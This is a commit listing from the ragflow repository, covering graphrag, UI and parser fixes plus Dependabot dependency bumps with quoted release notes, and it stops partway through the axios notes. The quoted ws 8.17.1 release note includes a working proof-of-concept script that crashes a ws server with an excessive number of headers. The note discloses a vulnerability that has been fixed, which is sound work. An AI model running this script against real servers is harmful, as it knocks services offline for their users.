Compare commits

509 Commits

Author SHA1 Message Date
3fd7db40ea refine mindmap (#1817)
### What problem does this PR solve?

#1594
### Type of change

- [x] Refactoring
2024-08-06 09:24:53 +08:00
5650442b0b refine context length (#1813)
### What problem does this PR solve?

#1594
### Type of change

- [x] Performance Improvement
2024-08-05 18:22:01 +08:00
5b013da4d6 refine docs for 0.9.0 release (#1812)
### What problem does this PR solve?



### Type of change

- [x] Documentation Update
2024-08-05 18:10:10 +08:00
fe797bcc66 be better chunks before graphrag (#1811)
### What problem does this PR solve?

#1594

### Type of change

- [x] Refactoring
2024-08-05 16:21:52 +08:00
9542f4484c feat: Translate ForceGraph #162 (#1810)
### What problem does this PR solve?

feat: Translate ForceGraph #162

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-08-05 16:04:57 +08:00
2452c5624f remove duplicated key in mind map (#1809)
### What problem does this PR solve?

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-08-05 15:57:33 +08:00
a5c03ccd4c refine mindmap prompt (#1808)
### What problem does this PR solve?



### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-08-05 15:33:44 +08:00
d2213141e0 Fix graphrag callback (#1806)
### What problem does this PR solve?

#1800 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-08-05 14:44:54 +08:00
3da3260eb5 fix: Fixed the issue that the related form value does not change after selecting the freedom field of the model #1804 (#1805)
### What problem does this PR solve?
fix: Fixed the issue that the related form value does not change after
selecting the freedom field of the model #1804

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-08-05 12:03:47 +08:00
07f283b73e refine Dockerfile (#1802)
### What problem does this PR solve?

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-08-05 09:38:51 +08:00
29509ff69d refine dockerfile (#1801)
### What problem does this PR solve?


### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-08-05 08:58:22 +08:00
216f6495c4 feat: Fixed the issue where the page reports an error when the graph returned by the interface is empty #162 (#1795)
### What problem does this PR solve?

feat: Fixed the issue where the page reports an error when the graph
returned by the interface is empty #162

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-08-03 06:42:48 +08:00
f60a249fe1 readme update (#1794)
### What problem does this PR solve?


### Type of change

- [x] Documentation Update
2024-08-02 19:16:04 +08:00
152072f900 Add graphrag (#1793)
### What problem does this PR solve?

#1594

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-08-02 18:51:14 +08:00
80032b1fc0 feat: Add IndentedTree #162 (#1792)
### What problem does this PR solve?

feat: Add IndentedTree #162

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-08-02 18:48:53 +08:00
5d55e6a049 Add component google scholar (#1790)
### What problem does this PR solve?

#1739 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-08-02 17:34:38 +08:00
418700b455 fix: Rename graph to agent #918 (#1785)
### What problem does this PR solve?

fix: Rename graph to agent #918

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-08-02 14:45:51 +08:00
eea6565472 fix: TypeError: Cannot read properties of undefined (reading 'viewport' #1761 (#1784)
### What problem does this PR solve?

fix: TypeError: Cannot read properties of undefined (reading 'viewport'
#1761

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-08-02 11:22:10 +08:00
3f21603558 feat: Hide KnowledgeGraphModal #162 (#1783)
### What problem does this PR solve?
feat: Hide KnowledgeGraphModal #162

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-08-02 10:40:56 +08:00
3a739e3dd7 feat: Add EntityTypesForm #162 (#1777)
### What problem does this PR solve?
feat: Add EntityTypesForm #162

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-08-02 10:03:05 +08:00
4ba1ba973a fix jina module not find bug (#1779)
### What problem does this PR solve?

fix jina module not find bug

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-08-01 19:52:56 +08:00
e8b9871fb9 feat: Alter style of ForceGraph #162 (#1774)
### What problem does this PR solve?

feat: alter style of ForceGraph #162
### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-08-01 19:24:03 +08:00
e37b0d217d feat: Add KnowledgeGraphModal #162 (#1766)
### What problem does this PR solve?

feat: Add KnowledgeGraphModal #162

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-08-01 17:27:27 +08:00
50e9df4c76 fix jina module not find bug (#1770)
### What problem does this PR solve?

fix jina module not find bug

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-08-01 17:26:11 +08:00
b9a50ef4b8 API: retrieval api (#1763)
### What problem does this PR solve?

Add a retrieval API for a specific knowledge base.


![ragflow](https://github.com/user-attachments/assets/dc30a4c3-03c5-4d34-bb7c-60b8830f1225)

https://github.com/infiniflow/ragflow/issues/1102

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-08-01 13:20:53 +08:00
da11a20c92 trival (#1760)
### What problem does this PR solve?

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-08-01 09:07:37 +08:00
955619c8ac feat: Increase the distance between nodes #162 (#1758)
### What problem does this PR solve?

feat: Increase the distance between nodes #162

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-31 19:21:16 +08:00
ad2e116367 feat: Classify nodes based on edge relationships #162 (#1755)
### What problem does this PR solve?
feat: Add ForceGraph
feat: Classify nodes based on edge relationships #162 

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-31 17:45:52 +08:00
ccbd4365be refactor stepfun cv model (#1751)
### What problem does this PR solve?

refactor stepfun cv model

### Type of change

- [x] Refactoring

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-07-31 15:30:47 +08:00
9169643157 add step-1v-8k cv model (#1686)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: lijianyong <lijianyong@stepfun.com>
2024-07-30 16:57:27 +08:00
5cff780ec4 lower openai version in requirements.txt (#1747)
### What problem does this PR solve?

lower openai version in requirements.txt

### Type of change

- [x] Refactoring

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-07-30 16:55:59 +08:00
ceb0419fe5 fix: delete chunk by @tanstack/react-query #1306 (#1749)
### What problem does this PR solve?
fix: delete chunk by @tanstack/react-query #1306

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-30 16:55:00 +08:00
74ebc497c1 fix: ERROR: 'CompletionUsage' object has no attribute 'get' (#1736)
### What problem does this PR solve?

_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-30 15:12:16 +08:00
161cb08bbd feat: Add bing and google operator #918 (#1745)
### What problem does this PR solve?

feat: Add bing and google operator #918

### Type of change


- [x] New Feature (non-breaking change which adds functionality)
2024-07-30 15:06:29 +08:00
ff8702f7de add support for LocalLLM (#1744)
### What problem does this PR solve?

add support for LocalLLM

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-07-30 14:07:00 +08:00
a973b9e01f Fix: Embedding err when docx contains unsupported images (#1720)
### What problem does this PR solve?

Fix embedding failing when a docx document contains unsupported
images.

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

---------

Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
2024-07-29 19:38:47 +08:00
5e19423d82 support reset the user email (#1735)
### What problem does this PR solve?

Support resetting the user email from the old address to a new one.
#1723 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-29 19:36:16 +08:00
29f7f8b81e fix MiniMax chat bug (#1733)
### What problem does this PR solve?

#1717   fix MiniMax chat bug

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-07-29 19:35:16 +08:00
6012f376ca Add component google,Bing (#1737)
### What problem does this PR solve?

### Type of change

- [x] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
2024-07-29 19:26:16 +08:00
8468031e39 fix: Fetch chunk list by @tanstack/react-query #1306 (#1738)
### What problem does this PR solve?

fix: Fetch chunk list by @tanstack/react-query #1306

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-29 19:20:13 +08:00
aac460ad29 Fix index=true (#1734)
### What problem does this PR solve?

### Type of change

- [x] Refactoring
---------

Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
2024-07-29 19:19:54 +08:00
753c13d76f fix add local vision llm error when cannot download test pic (#1732)
### What problem does this PR solve?

#1726   fix add local vision llm  error when cannot download test pic

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-07-29 11:52:59 +08:00
0cb588f7bf Fix docx parser line bug (#1715)
### What problem does this PR solve?
#1704 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

---------

Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
2024-07-29 10:06:02 +08:00
ebdd71ce68 fix: When parsing the bold content in PDF, the result is duplicated. (#1729)
### What problem does this PR solve?

_fix: When parsing the bold content in PDF, the result is duplicated._

Details: [When using OCR to recognize Chinese titles, the structure appears to be duplicated](https://github.com/infiniflow/ragflow/issues/1718)

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-29 09:43:05 +08:00
013856b604 Fix multiple generate (#1722)
### What problem does this PR solve?

#1625 

### Type of change

- [x] New Feature (non-breaking change which adds functionality)
2024-07-29 09:27:59 +08:00
61096596bc fix OpenAI llm return bug (#1728)
### What problem does this PR solve?

fix OpenAI llm return bug

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-29 09:21:31 +08:00
549d67e281 fix: test chunk by @tanstack/react-query #1306 (#1719)
### What problem does this PR solve?

fix: test chunk by @tanstack/react-query #1306

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-26 19:00:19 +08:00
79c873344b Fix docs parser (#1714)
### What problem does this PR solve?

#1711 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-26 10:52:56 +08:00
548f01850f Add Kibana component for Elasticsearch (#1710)
### What problem does this PR solve?
Add Kibana component for Elasticsearch

### Type of change

- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)

---------

Co-authored-by: Theta Wang (ncu) <chunshan.connect@gmail.com>
2024-07-26 10:34:35 +08:00
3f495b2d22 fix: Remove kAModel #1306 (#1713)
### What problem does this PR solve?

fix: Remove kAModel #1306
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-26 10:23:51 +08:00
c943517932 Fix pdfparser error (#1707)
### What problem does this PR solve?

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-25 18:54:36 +08:00
935687998e fix: fetch user by @tanstack/react-query #1306 (#1709)
### What problem does this PR solve?

fix: fetch user by @tanstack/react-query #1306

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-25 18:53:10 +08:00
375f621405 fix: fetch llm list by @tanstack/react-query #1306 (#1708)
### What problem does this PR solve?

fix: fetch llm list by @tanstack/react-query #1306

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-25 18:06:39 +08:00
a99d19bdea fix: alter Arxiv to ArXiv #918 (#1705)
### What problem does this PR solve?
fix: alter Arxiv to ArXiv #918
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-25 15:07:05 +08:00
906c0c5c89 fix: Set the default value of Self RAG to false #1220 (#1702)
### What problem does this PR solve?

fix: Set the default value of Self RAG  to false #1220
fix: Change all tool file names to kebab format

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-25 14:38:17 +08:00
c92d334b29 fix bug of regx (#1703)
### What problem does this PR solve?

#1689

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-25 14:30:58 +08:00
d38f995ba6 fix: Fix for Empty Reference Array Causing Errors (#1652)
### What problem does this PR solve?

This pull request addresses an issue where, in specific cases, the
reference is an empty array (`[]`) instead of an object. The code then
calls the `get` method on a list, which fails with the following error
message:
``` json
{"retcode": 500, "retmsg": "'list' object has no attribute 'get'", "data": {"answer": "**ERROR**: 'list' object has no attribute 'get'", "reference": []}}
```
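
The failure mode above can be illustrated with a minimal sketch. This is not the code from the PR: the helper name `extract_chunks` is hypothetical, and the payload shape is assumed from the error message shown above (`reference` is normally a dict with a `chunks` key, but may arrive as `[]`).

```python
from typing import Any


def extract_chunks(answer: dict[str, Any]) -> list[Any]:
    """Return the chunk list from an answer payload (hypothetical helper).

    Tolerates the case where "reference" is an empty list rather than a dict.
    """
    reference = answer.get("reference")
    # Failing case: "reference" is [] (a list), which has no .get() method.
    if not isinstance(reference, dict):
        return []
    return reference.get("chunks", [])
```

With a guard like this, a payload such as `{"answer": "...", "reference": []}` yields an empty chunk list instead of raising `AttributeError`.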

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
2024-07-25 14:14:42 +08:00
bc50f68127 fix embedding_model (#1698)
### What problem does this PR solve?
fix embedding_model #1692
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)

Signed-off-by: seaver <zhudan187@qq.com>
2024-07-25 11:43:43 +08:00
b24abee364 Fix pdfparser content confusion (#1700)
### What problem does this PR solve?

#1407 #1656 

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-25 11:40:23 +08:00
6fee2962cb fix: Limit the length of the new password input box to no less than 8 #1634 (#1696)
### What problem does this PR solve?

fix: Limit the length of the new password input box to no less than 8
#1634

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-25 11:02:24 +08:00
e67bfca552 refactor some llm api using openai api format (#1692)
### What problem does this PR solve?

refactor some llm api using openai api format

### Type of change

- [x] Refactoring

---------

Co-authored-by: Zhedong Cen <cenzhedong2@126.com>
2024-07-25 10:23:35 +08:00
d5f87a5498 fix: Set the default language to English #1306 (#1694)
### What problem does this PR solve?
fix: Set the default language to English #1306

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-24 19:19:13 +08:00
d7426d86d5 fix: Fixed an issue where the project could not be built #1306 (#1693)
### What problem does this PR solve?

fix: Fixed an issue where the project could not be built #1306

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-24 18:27:03 +08:00
7ca98848ac fix: Login with @tanstack/react-query #1306 (#1691)
### What problem does this PR solve?

fix: Login with @tanstack/react-query #1306

### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-24 18:02:58 +08:00
32d5885b68 Fix api reference empty bug (#1655)
### What problem does this PR solve?

Fix the API bug triggered by an empty reference. The two tracebacks below show the failures:
```
for chunk_i in answer['reference'].get('chunks',[]):
                   ^^^^^^^^^^^^^^^^^^^^^^^
AttributeError: 'list' object has no attribute 'get'
```
```
return np.array([d["relevance_score"] for d in res["results"]]), res["meta"]["tokens"]["input_tokens"]+res["meta"]["tokens"]["output_tokens"]
                                                   ~~~^^^^^^^^^^^
KeyError: 'results'
```
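
The second traceback (`KeyError: 'results'`) suggests the rerank response did not contain the expected field. A minimal sketch of a more defensive parse follows; it is an illustration rather than the PR's actual change. The function name `parse_rerank_response` is hypothetical, the response shape is assumed from the traceback, and a plain list is returned where the original line builds a NumPy array.

```python
from typing import Any


def parse_rerank_response(res: dict[str, Any]) -> tuple[list[float], int]:
    """Extract relevance scores and total token usage (hypothetical helper)."""
    # Fail with a descriptive message instead of a bare KeyError.
    if "results" not in res:
        raise ValueError(f"rerank response has no 'results' field: {res!r}")
    scores = [float(d["relevance_score"]) for d in res["results"]]
    # Token accounting is treated as optional; missing counts default to 0.
    tokens = res.get("meta", {}).get("tokens", {})
    total = int(tokens.get("input_tokens", 0)) + int(tokens.get("output_tokens", 0))
    return scores, total
```

Raising a descriptive `ValueError` is one possible design choice; returning empty scores would be another, depending on how callers should treat a failed rerank call.
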
### Type of change

- [x] Bug Fix (non-breaking change which fixes an issue)
2024-07-24 18:02:22 +08:00
f4d182e4ee build(deps-dev): bump ws from 8.17.0 to 8.18.0 in /web (#1668)
Bumps [ws](https://github.com/websockets/ws) from 8.17.0 to 8.18.0.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a
href="https://github.com/websockets/ws/releases">ws's
releases</a>.</em></p>
<blockquote>
<h2>8.18.0</h2>
<h1>Features</h1>
<ul>
<li>Added support for <code>Blob</code> (<a
href="https://redirect.github.com/websockets/ws/issues/2229">#2229</a>).</li>
</ul>
<h2>8.17.1</h2>
<h1>Bug fixes</h1>
<ul>
<li>Fixed a DoS vulnerability (<a
href="https://redirect.github.com/websockets/ws/issues/2231">#2231</a>).</li>
</ul>
<p>A request with a number of headers exceeding the
<code>server.maxHeadersCount</code> threshold could be used to crash a
ws server.</p>
<pre lang="js"><code>const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars =
    &quot;!#$%&amp;'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~&quot;.split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i &lt; chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j &lt; chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});
</code></pre>
<p>The vulnerability was reported by <a
href="https://github.com/rrlapointe">Ryan LaPointe</a> in <a
href="https://redirect.github.com/websockets/ws/issues/2230">websockets/ws#2230</a>.</p>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a
href="976c53c406"><code>976c53c</code></a>
[dist] 8.18.0</li>
<li><a
href="59b9629b78"><code>59b9629</code></a>
[feature] Add support for <code>Blob</code> (<a
href="https://redirect.github.com/websockets/ws/issues/2229">#2229</a>)</li>
<li><a
href="0d1b5e6c4a"><code>0d1b5e6</code></a>
[security] Use more descriptive text for 2017 vulnerability link</li>
<li><a
href="15f11a052a"><code>15f11a0</code></a>
[security] Add new DoS vulnerability to SECURITY.md</li>
<li><a
href="3c56601092"><code>3c56601</code></a>
[dist] 8.17.1</li>
<li><a
href="e55e5106f1"><code>e55e510</code></a>
[security] Fix crash when the Upgrade header cannot be read (<a
href="https://redirect.github.com/websockets/ws/issues/2231">#2231</a>)</li>
<li><a
href="6a00029edd"><code>6a00029</code></a>
[test] Increase code coverage</li>
<li><a
href="ddfe4a804d"><code>ddfe4a8</code></a>
[perf] Reduce the amount of <code>crypto.randomFillSync()</code>
calls</li>
<li>See full diff in <a
href="https://github.com/websockets/ws/compare/8.17.0...8.18.0">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=ws&package-manager=npm_and_yarn&previous-version=8.17.0&new-version=8.18.0)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

---

<details>
<summary>Dependabot commands and options</summary>
<br />

You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits
that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after
your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge
and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating
it. You can achieve the same result by closing it manually
- `@dependabot show <dependency name> ignore conditions` will show all
of the ignore conditions of the specified dependency
- `@dependabot ignore this major version` will close this PR and stop
Dependabot creating any more for this major version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop
Dependabot creating any more for this minor version (unless you reopen
the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop
Dependabot creating any more for this dependency (unless you reopen the
PR or upgrade to it yourself)
You can disable automated security fix PRs for this repo from the
[Security Alerts
page](https://github.com/infiniflow/ragflow/network/alerts).

</details>

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-07-24 16:43:52 +08:00
69b9581417 build(deps): bump follow-redirects from 1.15.4 to 1.15.6 in /web (#1678)
Bumps
[follow-redirects](https://github.com/follow-redirects/follow-redirects)
from 1.15.4 to 1.15.6.
<details>
<summary>Commits</summary>
<ul>
<li><a
href="35a517c586"><code>35a517c</code></a>
Release version 1.15.6 of the npm package.</li>
<li><a
href="c4f847f851"><code>c4f847f</code></a>
Drop Proxy-Authorization across hosts.</li>
<li><a
href="8526b4a1b2"><code>8526b4a</code></a>
Use GitHub for disclosure.</li>
<li><a
href="b1677ce001"><code>b1677ce</code></a>
Release version 1.15.5 of the npm package.</li>
<li><a
href="d8914f7982"><code>d8914f7</code></a>
Preserve fragment in responseUrl.</li>
<li>See full diff in <a
href="https://github.com/follow-redirects/follow-redirects/compare/v1.15.4...v1.15.6">compare
view</a></li>
</ul>
</details>
<br />


[![Dependabot compatibility
score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=follow-redirects&package-manager=npm_and_yarn&previous-version=1.15.4&new-version=1.15.6)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)

Dependabot will resolve any conflicts with this PR as long as you don't
alter it yourself. You can also trigger a rebase manually by commenting
`@dependabot rebase`.

[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2024-07-24 16:43:40 +08:00
1e21056364 build(deps-dev): bump axios from 0.27.2 to 1.7.2 in /web (#1679)
Bumps [axios](https://github.com/axios/axios) from 0.27.2 to 1.7.2.
<details>
<summary>Release notes</summary>
<p><em>Sourced from <a
href="https://github.com/axios/axios/releases">axios's
releases</a>.</em></p>
<blockquote>
<h2>Release v1.7.2</h2>
<h2>Release notes:</h2>
<h3>Bug Fixes</h3>
<ul>
<li><strong>fetch:</strong> enhance fetch API detection; (<a
href="https://redirect.github.com/axios/axios/issues/6413">#6413</a>)
(<a
href="4f79aef81b">4f79aef</a>)</li>
</ul>
<h3>Contributors to this release</h3>
<ul>
<li><!-- raw HTML omitted --> <a
href="https://github.com/DigitalBrainJS" title="+3/-3
([#6413](https://github.com/axios/axios/issues/6413) )">Dmitriy
Mozgovoy</a></li>
</ul>
<h2>Release v1.7.1</h2>
<h2>Release notes:</h2>
<h3>Bug Fixes</h3>
<ul>
<li><strong>fetch:</strong> fixed ReferenceError issue when TextEncoder
is not available in the environment; (<a
href="https://redirect.github.com/axios/axios/issues/6410">#6410</a>)
(<a
href="733f15fe5b">733f15f</a>)</li>
</ul>
<h3>Contributors to this release</h3>
<ul>
<li><!-- raw HTML omitted --> <a
href="https://github.com/DigitalBrainJS" title="+14/-9
([#6410](https://github.com/axios/axios/issues/6410) )">Dmitriy
Mozgovoy</a></li>
</ul>
<h2>Release v1.7.0</h2>
<h2>Release notes:</h2>
<h3>Features</h3>
<ul>
<li><strong>adapter:</strong> add fetch adapter; (<a
href="https://redirect.github.com/axios/axios/issues/6371">#6371</a>)
(<a
href="a3ff99b59d">a3ff99b</a>)</li>
</ul>
<h3>Bug Fixes</h3>
<ul>
<li><strong>core/axios:</strong> handle un-writable error stack (<a
href="https://redirect.github.com/axios/axios/issues/6362">#6362</a>)
(<a
href="81e0455b7b">81e0455</a>)</li>
</ul>
<h3>Contributors to this release</h3>
<ul>
<li><!-- raw HTML omitted --> <a
href="https://github.com/DigitalBrainJS" title="+1015/-127
([#6371](https://github.com/axios/axios/issues/6371) )">Dmitriy
Mozgovoy</a></li>
<li><!-- raw HTML omitted --> <a href="https://github.com/jasonsaayman"
title="+30/-14 ()">Jay</a></li>
<li><!-- raw HTML omitted --> <a
href="https://github.com/alexandre-abrioux" title="+56/-6
([#6362](https://github.com/axios/axios/issues/6362) )">Alexandre
ABRIOUX</a></li>
</ul>
<h2>Release v1.7.0-beta.2</h2>
<h2>Release notes:</h2>
<h3>Bug Fixes</h3>
<ul>
<li><strong>fetch:</strong> capitalize HTTP method names; (<a
href="https://redirect.github.com/axios/axios/issues/6395">#6395</a>)
(<a
href="ad3174a351">ad3174a</a>)</li>
<li><strong>fetch:</strong> fix &amp; optimize progress capturing for
cases when the request data has a nullish value or zero data length (<a
href="https://redirect.github.com/axios/axios/issues/6400">#6400</a>)
(<a
href="95a3e8e346">95a3e8e</a>)</li>
<li><strong>fetch:</strong> fix headers getting from a stream response;
(<a
href="https://redirect.github.com/axios/axios/issues/6401">#6401</a>)
(<a
href="870e0a76f6">870e0a7</a>)</li>
</ul>
<h3>Contributors to this release</h3>
<ul>
<li><!-- raw HTML omitted --> <a
href="https://github.com/DigitalBrainJS" title="+99/-46
([#6405](https://github.com/axios/axios/issues/6405)
[#6404](https://github.com/axios/axios/issues/6404)
[#6401](https://github.com/axios/axios/issues/6401)
[#6400](https://github.com/axios/axios/issues/6400)
[#6395](https://github.com/axios/axios/issues/6395) )">Dmitriy
Mozgovoy</a></li>
</ul>
<h2>Release v1.7.0-beta.1</h2>
<h2>Release notes:</h2>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a
href="https://github.com/axios/axios/blob/v1.x/CHANGELOG.md">axios's
changelog</a>.</em></p>
<blockquote>
<h2><a
href="https://github.com/axios/axios/compare/v1.7.1...v1.7.2">1.7.2</a>
(2024-05-21)</h2>
<h3>Bug Fixes</h3>
<ul>
<li><strong>fetch:</strong> enhance fetch API detection; (<a
href="https://redirect.github.com/axios/axios/issues/6413">#6413</a>)
(<a
href="4f79aef81b">4f79aef</a>)</li>
</ul>
<h3>Contributors to this release</h3>
<ul>
<li><!-- raw HTML omitted --> <a
href="https://github.com/DigitalBrainJS" title="+3/-3
([#6413](https://github.com/axios/axios/issues/6413) )">Dmitriy
Mozgovoy</a></li>
</ul>
<h2><a
href="https://github.com/axios/axios/compare/v1.7.0...v1.7.1">1.7.1</a>
(2024-05-20)</h2>
<h3>Bug Fixes</h3>
<ul>
<li><strong>fetch:</strong> fixed ReferenceError issue when TextEncoder
is not available in the environment; (<a
href="https://redirect.github.com/axios/axios/issues/6410">#6410</a>)
(<a
href="733f15fe5b">733f15f</a>)</li>
</ul>
<h3>Contributors to this release</h3>
<ul>
<li><!-- raw HTML omitted --> <a
href="https://github.com/DigitalBrainJS" title="+14/-9
([#6410](https://github.com/axios/axios/issues/6410) )">Dmitriy
Mozgovoy</a></li>
</ul>
<h1><a
href="https://github.com/axios/axios/compare/v1.7.0-beta.2...v1.7.0">1.7.0</a>
(2024-05-19)</h1>
<h3>Features</h3>
<ul>
<li><strong>adapter:</strong> add fetch adapter; (<a
href="https://redirect.github.com/axios/axios/issues/6371">#6371</a>)
(<a
href="a3ff99b59d">a3ff99b</a>)</li>
</ul>
<h3>Bug Fixes</h3>
<ul>
<li><strong>core/axios:</strong> handle un-writable error stack (<a
href="https://redirect.github.com/axios/axios/issues/6362">#6362</a>)
(<a
href="81e0455b7b">81e0455</a>)</li>
</ul>
<h3>Contributors to this release</h3>
<ul>
<li><!-- raw HTML omitted --> <a
href="https://github.com/DigitalBrainJS" title="+1015/-127
([#6371](https://github.com/axios/axios/issues/6371) )">Dmitriy
Mozgovoy</a></li>
<li><!-- raw HTML omitted --> <a href="https://github.com/jasonsaayman"
title="+30/-14 ()">Jay</a></li>
<li><!-- raw HTML omitted --> <a
href="https://github.com/alexandre-abrioux" title="+56/-6
([#6362](https://github.com/axios/axios/issues/6362) )">Alexandre
ABRIOUX</a></li>
</ul>
<h1><a
href="https://github.com/axios/axios/compare/v1.7.0-beta.1...v1.7.0-beta.2">1.7.0-beta.2</a>
(2024-05-19)</h1>
<h3>Bug Fixes</h3>
<ul>
<li><strong>fetch:</strong> capitalize HTTP method names; (<a
href="https://redirect.github.com/axios/axios/issues/6395">#6395</a>)
(<a
href="ad3174a351">ad3174a</a>)</li>
<li><strong>fetch:</strong> fix &amp; optimize progress capturing for
cases when the request data has a nullish value or zero data length (<a
href="https://redirect.github.com/axios/axios/issues/6400">#6400</a>)
(<a
href="95a3e8e346">95a3e8e</a>)</li>
<li><strong>fetch:</strong> fix headers getting from a stream response;
(<a
href="https://redirect.github.com/axios/axios/issues/6401">#6401</a>)
(<a
href="870e0a76f6">870e0a7</a>)</li>
</ul>
<h3>Contributors to this release</h3>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a
href="0e4f9fa290"><code>0e4f9fa</code></a>
chore(release): v1.7.2 (<a
href="https://redirect.github.com/axios/axios/issues/6414">#6414</a>)</li>
<li><a
